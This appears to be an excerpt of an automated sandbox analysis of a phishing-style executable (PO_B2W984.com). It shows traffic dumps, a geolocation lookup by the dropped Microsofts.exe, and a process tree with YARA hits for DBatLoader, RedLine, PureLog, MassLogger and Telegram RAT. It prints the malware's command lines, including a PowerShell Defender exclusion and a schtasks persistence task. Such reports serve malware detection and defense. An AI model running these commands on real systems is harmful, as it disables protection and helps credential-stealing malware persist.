2025-01-03 01:47:09 UTC  8000               IN         Data Raw: 61 36 5a 31 78 65 4b 75 6d 31 68 30 45 48 61 2b 6c 51 73 6a 64 70 71 37 4e 47 54 2f 58 74 2f 75 48 6a 4e 49 65 38 56 66 62 32 48 67 48 71 31 58 36 32 32 53 72 4d 4e 52 2b 39 66 59 78 54 6d 66 46 66 69 4b 64 37 52 68 46 74 41 67 68 6f 7a 76 56 59 59 69 63 2f 4f 51 63 71 78 44 79 50 34 67 76 4a 77 37 76 47 55 35 57 52 30 61 6c 39 69 4b 4f 33 51 69 4d 6c 44 6f 5a 36 64 79 37 42 4c 77 78 75 78 48 63 57 78 79 4d 45 30 4e 68 47 6f 4b 72 72 38 4c 34 2b 63 39 6c 67 71 30 72 49 34 7a 35 75 2b 58 51 57 59 77 55 57 30 4b 6c 49 77 6f 44 45 34 6a 39 48 6d 79 58 6e 38 68 71 49 66 4c 2b 73 38 45 53 34 67 6b 63 54 4b 65 54 35 77 34 4d 48 57 48 76 4d 59 68 57 43 41 4b 41 74 74 2f 2f 6b 4c 7a 42 7a 2f 6b 34 6c 4a 31 6c 36 59 2f 73 64 42 79 4d 6e 57 53 32 35 5a 65 33 50 55
    Data Ascii: a6Z1xeKum1h0EHa+lQsjdpq7NGT/Xt/uHjNIe8Vfb2HgHq1X622SrMNR+9fYxTmfFfiKd7RhFtAghozvVYYic/OQcqxDyP4gvJw7vGU5WR0al9iKO3QiMlDoZ6dy7BLwxuxHcWxyME0NhGoKrr8L4+c9lgq0rI4z5u+XQWYwUW0KlIwoDE4j9HmyXn8hqIfL+s8ES4gkcTKeT5w4MHWHvMYhWCAKAtt//kLzBz/k4lJ1l6Y/sdByMnWS25Ze3PU
2025-01-03 01:47:09 UTC  8000               IN         Data Raw: 4b 78 47 37 4a 66 67 4d 48 55 76 73 51 5a 71 6c 6e 45 42 67 63 75 71 65 73 69 6a 4b 6a 6e 67 55 65 37 78 33 4e 35 6c 77 6c 73 69 50 6e 65 4b 54 57 74 65 49 66 4b 43 2f 52 73 78 62 42 69 77 4e 45 65 4e 61 54 6b 42 4d 70 59 58 69 50 37 47 30 2f 46 67 53 49 34 6e 41 66 73 4e 64 39 69 70 30 75 62 74 42 72 61 6f 6d 67 4c 72 61 43 5a 33 54 34 65 5a 6d 43 71 44 5a 2f 6b 63 73 6e 75 66 36 74 6d 48 61 61 54 61 38 4c 45 55 70 52 6d 4e 6b 39 43 6b 37 4c 2b 72 4c 55 7a 35 4d 50 66 42 51 37 43 56 6f 64 77 75 4a 4d 68 44 75 4e 34 7a 4a 4c 5a 7a 54 56 38 44 46 59 70 48 44 33 67 74 6b 48 78 4e 42 55 57 30 32 56 6e 78 68 41 79 46 74 42 71 62 34 50 55 4c 36 53 77 66 46 30 45 78 71 6b 34 69 64 4a 48 31 6f 4e 6c 75 6b 79 41 54 54 32 41 55 53 33 33 67 31 36 75 7a 35 4f 5a 39
    Data Ascii: KxG7JfgMHUvsQZqlnEBgcuqesijKjngUe7x3N5lwlsiPneKTWteIfKC/RsxbBiwNEeNaTkBMpYXiP7G0/FgSI4nAfsNd9ip0ubtBraomgLraCZ3T4eZmCqDZ/kcsnuf6tmHaaTa8LEUpRmNk9Ck7L+rLUz5MPfBQ7CVodwuJMhDuN4zJLZzTV8DFYpHD3gtkHxNBUW02VnxhAyFtBqb4PUL6SwfF0Exqk4idJH1oNlukyATT2AUS33g16uz5OZ9
2025-01-03 01:47:09 UTC  8000               IN         Data Raw: 70 39 67 32 58 44 4e 47 53 48 55 4a 78 38 43 2b 72 73 69 43 6f 43 31 54 2b 31 54 79 36 6b 72 57 58 4e 42 49 4e 63 6a 41 49 6f 30 56 6d 68 6a 39 37 70 72 47 33 4e 66 44 36 4e 79 36 55 41 53 4e 52 33 44 51 6f 6d 4e 68 39 71 6b 54 62 66 58 2f 79 4d 46 65 73 6c 6c 39 2f 45 4f 7a 32 54 44 58 48 66 58 54 77 6e 69 79 33 4d 6b 4b 6c 50 64 46 31 61 43 79 54 64 55 43 7a 6e 54 6b 63 4c 31 30 6e 72 71 48 36 51 62 65 78 79 2f 71 75 43 74 55 4b 69 63 4a 44 6d 4f 53 75 6d 31 6f 6a 4b 72 48 73 71 43 58 4d 32 4d 2b 53 2f 62 33 53 75 62 2f 56 56 76 7a 79 75 67 63 64 6e 4c 6c 2b 72 77 74 37 42 4d 57 5a 58 69 43 57 66 76 61 4b 79 49 64 31 51 4b 51 61 5a 4f 71 4a 2f 57 7a 4b 79 6f 2b 67 63 74 4b 68 70 53 77 49 34 36 55 6b 5a 67 77 77 77 35 55 69 6a 57 6e 35 41 70 6d 75 4b 45
    Data Ascii: p9g2XDNGSHUJx8C+rsiCoC1T+1Ty6krWXNBINcjAIo0Vmhj97prG3NfD6Ny6UASNR3DQomNh9qkTbfX/yMFesll9/EOz2TDXHfXTwniy3MkKlPdF1aCyTdUCznTkcL10nrqH6Qbexy/quCtUKicJDmOSum1ojKrHsqCXM2M+S/b3Sub/VVvzyugcdnLl+rwt7BMWZXiCWfvaKyId1QKQaZOqJ/WzKyo+gctKhpSwI46UkZgwww5UijWn5ApmuKE
2025-01-03 01:47:09 UTC  8000               IN         Data Raw: 59 6b 70 67 78 4b 4d 6f 68 4a 41 6f 5a 45 37 6c 6e 2b 50 76 50 4b 4f 65 56 72 54 4f 43 58 62 6d 77 76 57 47 61 38 32 45 61 41 74 72 57 65 71 64 6e 41 75 72 32 72 6a 66 79 64 52 76 76 70 6c 79 7a 32 50 39 4d 58 4c 35 58 33 66 2b 31 48 54 51 47 6c 39 73 31 44 41 45 5a 6c 6a 62 72 54 71 53 30 72 73 4a 30 50 69 4a 4d 59 6a 69 73 79 49 6b 4b 74 6f 58 63 5a 2b 50 45 4b 54 32 58 70 32 6b 36 50 53 2f 70 6b 42 66 45 38 7a 59 6f 47 74 34 67 58 48 75 6e 6a 30 4c 43 7a 51 39 76 34 68 33 2b 37 42 54 63 43 39 4f 59 76 6b 76 6c 38 42 4a 45 6d 48 38 74 56 4c 4f 79 46 6c 51 51 70 68 39 4d 4c 6a 67 54 51 65 49 71 78 71 31 65 51 31 79 41 43 6d 50 64 38 70 69 70 33 47 6b 49 34 6d 65 7a 4a 64 72 77 73 34 6c 31 39 36 6d 58 4d 70 52 69 75 2b 61 52 2f 6d 76 73 32 61 6f 6b 35 6c
    Data Ascii: YkpgxKMohJAoZE7ln+PvPKOeVrTOCXbmwvWGa82EaAtrWeqdnAur2rjfydRvvplyz2P9MXL5X3f+1HTQGl9s1DAEZljbrTqS0rsJ0PiJMYjisyIkKtoXcZ+PEKT2Xp2k6PS/pkBfE8zYoGt4gXHunj0LCzQ9v4h3+7BTcC9OYvkvl8BJEmH8tVLOyFlQQph9MLjgTQeIqxq1eQ1yACmPd8pip3GkI4mezJdrws4l196mXMpRiu+aR/mvs2aok5l
2025-01-03 01:47:09 UTC  8000               IN         Data Raw: 4a 52 44 75 52 33 66 61 6a 65 34 76 35 71 42 2f 70 62 37 43 62 77 4a 48 42 72 57 35 53 56 6c 73 4f 6c 2f 56 7a 30 54 53 50 42 56 33 75 41 47 6f 79 39 4a 75 54 66 74 48 2f 49 32 5a 55 53 62 5a 56 51 65 71 34 4b 35 7a 51 62 36 65 4e 6c 7a 32 72 32 58 5a 73 44 56 6e 4f 2f 35 69 71 35 70 77 33 32 78 68 6b 4f 42 75 68 56 76 6e 51 6e 59 4d 77 56 6e 6a 46 2b 2b 51 6b 34 4a 6c 61 43 6c 69 6e 6e 77 65 49 33 5a 50 67 2b 48 53 6c 67 52 46 52 71 7a 76 57 45 74 33 2b 46 33 76 6a 56 44 37 53 2b 2b 73 2b 33 2b 44 69 73 42 31 51 71 36 44 6e 6d 39 6b 37 4a 58 30 69 53 75 38 5a 4d 4d 79 73 42 78 78 4e 48 7a 38 4f 72 6a 35 65 4b 44 59 58 2f 4f 77 74 78 6d 33 6e 50 6b 70 5a 6c 53 49 76 70 41 53 39 73 38 42 30 37 4a 62 5a 33 72 73 56 58 36 6d 39 4b 6a 36 46 6c 54 5a 32 67 4c
    Data Ascii: JRDuR3faje4v5qB/pb7CbwJHBrW5SVlsOl/Vz0TSPBV3uAGoy9JuTftH/I2ZUSbZVQeq4K5zQb6eNlz2r2XZsDVnO/5iq5pw32xhkOBuhVvnQnYMwVnjF++Qk4JlaClinnweI3ZPg+HSlgRFRqzvWEt3+F3vjVD7S++s+3+DisB1Qq6Dnm9k7JX0iSu8ZMMysBxxNHz8Orj5eKDYX/Owtxm3nPkpZlSIvpAS9s8B07JbZ3rsVX6m9Kj6FlTZ2gL
2025-01-03 01:47:09 UTC  8000               IN         Data Raw: 79 50 69 34 33 75 55 39 6c 56 41 6f 54 35 34 56 64 54 4e 69 73 30 37 54 42 52 35 69 45 66 46 68 34 74 44 54 75 74 73 36 72 69 34 79 79 57 6c 6d 72 2b 4a 35 58 39 65 75 65 31 58 4a 4d 37 56 57 46 48 75 72 51 55 4c 74 4a 53 4a 66 57 65 5a 5a 47 5a 76 38 65 2f 53 77 48 4f 6b 73 6d 67 78 43 52 79 77 52 36 6b 4d 50 42 64 61 32 45 74 56 79 6a 72 71 30 53 6d 52 56 68 52 43 33 35 59 54 64 56 32 2f 55 49 4b 59 67 4a 66 45 6b 68 53 34 57 30 7a 70 77 76 46 66 45 4d 65 48 51 49 4e 6d 66 73 37 6d 6f 76 4d 4a 47 4a 47 31 45 32 78 66 68 71 6f 42 70 6d 37 48 35 56 42 58 6a 38 44 37 35 68 43 36 4d 6e 4b 4a 33 35 56 79 4d 6b 77 61 73 62 71 30 4d 4f 52 70 6a 45 74 49 65 64 56 53 30 45 74 30 71 39 71 6d 78 6b 57 58 6a 52 45 76 5a 79 72 6b 2b 45 64 65 32 65 30 68 78 79 4b 2f
                                                                                                                                      Data Ascii: yPi43uU9lVAoT54VdTNis07TBR5iEfFh4tDTuts6ri4yyWlmr+J5X9eue1XJM7VWFHurQULtJSJfWeZZGZv8e/SwHOksmgxCRywR6kMPBda2EtVyjrq0SmRVhRC35YTdV2/UIKYgJfEkhS4W0zpwvFfEMeHQINmfs7movMJGJG1E2xfhqoBpm7H5VBXj8D75hC6MnKJ35VyMkwasbq0MORpjEtIedVS0Et0q9qmxkWXjREvZyrk+Ede2e0hxyK/
                                                                                                                                      2025-01-03 01:47:09 UTC8000INData Raw: 58 65 34 51 64 2f 69 2b 65 64 63 2f 59 69 6a 6e 46 4a 56 4d 49 67 32 59 32 4d 46 5a 57 55 70 63 4f 77 59 75 45 74 62 56 48 49 4e 71 7a 32 6d 34 66 6f 79 79 41 4e 2f 70 75 6f 35 66 55 68 41 57 42 59 51 79 6e 78 4f 4c 33 43 45 77 57 79 62 4b 61 4c 45 49 49 34 4a 32 55 52 79 6b 55 38 2b 4f 77 30 71 6a 55 62 4b 58 71 77 5a 79 65 57 4b 53 44 6f 47 79 56 51 6d 52 45 58 72 4c 36 7a 62 67 52 57 4a 77 46 39 75 61 4e 2b 58 61 38 30 6d 71 48 53 35 75 39 68 77 70 31 47 79 4d 41 30 51 39 37 45 67 4c 4c 41 38 79 48 56 59 44 4f 70 68 6b 35 4a 5a 4e 65 4b 55 44 67 63 4d 33 4f 39 71 76 5a 49 58 32 43 54 36 75 4f 6d 57 37 4f 51 7a 5a 46 6a 6e 30 30 30 4d 48 38 79 74 76 43 38 66 35 32 44 6f 75 30 61 62 79 57 4f 54 78 63 6a 67 6e 48 51 52 6f 64 4e 71 68 5a 47 33 54 61 34 43
                                                                                                                                      Data Ascii: Xe4Qd/i+edc/YijnFJVMIg2Y2MFZWUpcOwYuEtbVHINqz2m4foyyAN/puo5fUhAWBYQynxOL3CEwWybKaLEII4J2URykU8+Ow0qjUbKXqwZyeWKSDoGyVQmREXrL6zbgRWJwF9uaN+Xa80mqHS5u9hwp1GyMA0Q97EgLLA8yHVYDOphk5JZNeKUDgcM3O9qvZIX2CT6uOmW7OQzZFjn000MH8ytvC8f52Dou0abyWOTxcjgnHQRodNqhZG3Ta4C


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49749 | 104.21.67.152 | 443 | 4824 | C:\Users\user\AppData\Local\Temp\Microsofts.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-03 01:47:15 UTC | 88 | OUT | GET /xml/102.129.153.238 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-03 01:47:15 UTC | 868 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 01:47:15 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: MISS
Last-Modified: Fri, 03 Jan 2025 01:47:15 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XLH7TLQvRotXoZ7dDugG2zlT0PvTudIJshsDMNQ4dBVZb3nqZznAVRNZXGow3%2FEQls4rczxMDrkA0qBXoHW6VHalqJbnNqZzk2nmGytFnMZRHvgoTJV%2BbM7FW9Zrhj6pdmCR%2B0jp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fbf51ddcc2f6c87-MIA
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=129041&min_rtt=128914&rtt_var=27308&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=702&delivery_rate=29643&cwnd=252&unsent_bytes=0&cid=a741716c3c17800e&ts=705&x=0"
2025-01-03 01:47:15 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 33 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 46 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 46 6c 6f 72 69 64 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4d 69 61 6d 69 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 33 33 31 39 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
Data Ascii: <Response><IP>102.129.153.238</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>FL</RegionCode><RegionName>Florida</RegionName><City>Miami</City><ZipCode>33197</ZipCode><TimeZone>America/New_York</TimeZon



Target ID: 0
Start time: 20:47:04
Start date: 02/01/2025
Path: C:\Users\user\Desktop\PO_B2W984.com
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PO_B2W984.com"
Imagebase: 0x400000
File size: 2'145'792 bytes
MD5 hash: F7D9FFE252E26320F26A76FC3F239C50
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.22895700001.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.22967000001.0000000002436000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 20:47:11
Start date: 02/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase: 0xb20000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 20:47:11
Start date: 02/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6aaab0000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 20:47:12
Start date: 02/01/2025
Path: C:\Users\Public\Libraries\rpkhzpuO.pif
Wow64 process (32bit): true
Commandline: C:\Users\Public\Libraries\rpkhzpuO.pif
Imagebase: 0x400000
File size: 175'800 bytes
MD5 hash: 22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000003.22965228435.000000002761C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000001.22963397742.00000000017D0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 3%, ReversingLabs
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 20:47:12
Start date: 02/01/2025
Path: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Imagebase: 0x7b0000
File size: 70'656 bytes
MD5 hash: E91A1DB64F5262A633465A0AAFF7A0B0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 79%, ReversingLabs
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 20:47:12
Start date: 02/01/2025
Path: C:\Users\user\AppData\Local\Temp\Microsofts.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
Imagebase: 0x800000
File size: 98'816 bytes
MD5 hash: F6B8018A27BCDBAA35778849B586D31B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.24180228176.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Author: unknown
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 91%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 7
Start time: 20:47:14
Start date: 02/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase: 0x80000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:20:47:14
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                      Imagebase:0x3c0000
                                                                                                                                      File size:187'904 bytes
                                                                                                                                      MD5 hash:478BEAEC1C3A9417272BC8964ADD1CEE
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:20:47:14
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6aaab0000
                                                                                                                                      File size:875'008 bytes
                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:20:47:14
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6aaab0000
                                                                                                                                      File size:875'008 bytes
                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:11
                                                                                                                                      Start time:20:47:15
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                      Imagebase:0x7ff6728c0000
                                                                                                                                      File size:496'640 bytes
                                                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:20:47:21
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Users\Public\Libraries\Oupzhkpr.PIF
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\Public\Libraries\Oupzhkpr.PIF"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:2'145'792 bytes
                                                                                                                                      MD5 hash:F7D9FFE252E26320F26A76FC3F239C50
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 27%, ReversingLabs
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:13
                                                                                                                                      Start time:20:47:21
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                      Imagebase:0xb20000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:20:47:21
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6aaab0000
                                                                                                                                      File size:875'008 bytes
                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:20:47:21
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:175'800 bytes
                                                                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.23112425454.000000002DA40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000003.23062543754.000000002B733000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000002.23100866629.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000001.23060773301.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.23114375641.000000002EA95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.23111776153.000000002D593000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.23115572603.00000000304E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:20:47:29
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Users\Public\Libraries\Oupzhkpr.PIF
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\Public\Libraries\Oupzhkpr.PIF"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:2'145'792 bytes
                                                                                                                                      MD5 hash:F7D9FFE252E26320F26A76FC3F239C50
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:17
                                                                                                                                      Start time:20:47:29
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                      Imagebase:0xb20000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:18
                                                                                                                                      Start time:20:47:29
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6aaab0000
                                                                                                                                      File size:875'008 bytes
                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:19
